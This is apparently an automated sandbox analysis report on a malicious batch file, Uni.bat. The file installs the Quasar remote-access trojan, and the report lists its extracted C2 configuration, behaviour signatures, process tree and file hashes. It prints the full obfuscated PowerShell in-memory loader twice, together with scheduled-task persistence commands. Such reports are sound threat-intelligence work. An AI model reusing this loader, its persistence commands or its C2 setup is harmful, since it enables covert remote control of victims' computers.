Analysis
max time kernel: 209s
max time network: 211s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-04-2024 01:41
Static task: static1
General
Target: Uni.bat
Size: 1.8MB
MD5: 14516087f9549022d5582272910428b1
SHA1: 53324370839fa1c07bfa42cf7cb3039513805d42
SHA256: 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
SHA512: cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
SSDEEP: 24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy
Malware Config
Extracted family: quasar
version: 1.4.1
tag: SLAVE
C2: uk2.localto.net:39077
mutex: cc0a2b76-665e-4e16-b318-5ee02270fbcd
encryption_key: D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
install_name: UpdateHost.exe
log_directory: Error Logs
reconnect_delay: 3000
startup_key: WOS64
subdirectory: Windows
Signatures

Quasar payload (1 IoC)
  resource: behavioral1/memory/3600-52-0x000001BCA91F0000-0x000001BCA9514000-memory.dmp
  yara_rule: family_quasar

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation (process: WScript.exe)

Executes dropped EXE (1 IoC)
  PID 440 UpdateHost.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings (process: powershell.exe)

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  PID 4528 powershell.exe, PID 4120 powershell.exe, PID 3600 powershell.exe, PID 440 UpdateHost.exe (each logged twice)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  PID 4528 powershell.exe: SeDebugPrivilege
  PID 4120 powershell.exe: SeDebugPrivilege, then the following sequence, logged three times (the listing is capped at 64 entries, so the third pass ends at token 35):
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of WriteProcessMemory (14 IoCs)
  Each parent-to-child write is logged twice:
  PID 1216 cmd.exe -> PID 4528 powershell.exe
  PID 4528 powershell.exe -> PID 4120 powershell.exe
  PID 4528 powershell.exe -> PID 4988 WScript.exe
  PID 4988 WScript.exe -> PID 3648 cmd.exe
  PID 3648 cmd.exe -> PID 3600 powershell.exe
  PID 3600 powershell.exe -> PID 1440 schtasks.exe
  PID 3600 powershell.exe -> PID 440 UpdateHost.exe

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

[1] C:\Windows\system32\cmd.exe
    command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      (The reversed string literals resolve to FromBase64String, Load and ReadAllText: the script reads the ':: ' comment line of the .bat, splits it on '\', base64-decodes, AES-CBC-decrypts and gunzips each of the two parts, then loads each result as a .NET assembly in memory and invokes its entry point.)
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_187_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_187.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WScript.exe
        command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_187.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe
          command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_187.bat" "
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_187.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_187.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            (Same loader as [2], now run from the dropped copy startup_str_187.bat.)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\SYSTEM32\schtasks.exe
              command: "schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
              command: "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 661739d384d9dfd807a089721202900b
  SHA1: 5b2c5d6a7122b4ce849dc98e79a7713038feac55
  SHA256: 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
  SHA512: 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: ee6f5f5e5924783870aeedeccdafe9da
  SHA1: 0e12ede20df5ec37f2bf3608ad1bc9b4649450fd
  SHA256: ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416
  SHA512: 998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfqo0j1f.0i5.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

C:\Users\Admin\AppData\Roaming\startup_str_187.bat (same hashes as the submitted Uni.bat)
  Filesize: 1.8MB
  MD5: 14516087f9549022d5582272910428b1
  SHA1: 53324370839fa1c07bfa42cf7cb3039513805d42
  SHA256: 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
  SHA512: cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

C:\Users\Admin\AppData\Roaming\startup_str_187.vbs
  Filesize: 115B
  MD5: 9464289340f6a8d3c247e0be8974b90f
  SHA1: 976b9e3c071a56260286a02c893e03d5930e33ac
  SHA256: 542afaf3fcca2ab637c5fd367b86194176d86959253ce18f0da7343e9425fafe
  SHA512: f4df3974dfec6e0725d96ada90d5805829f06a95a93883041b56283a1353a67faafb06afdd061aeecf2a759cc32313bc134fa85338d1c567f38f6b21e04692c5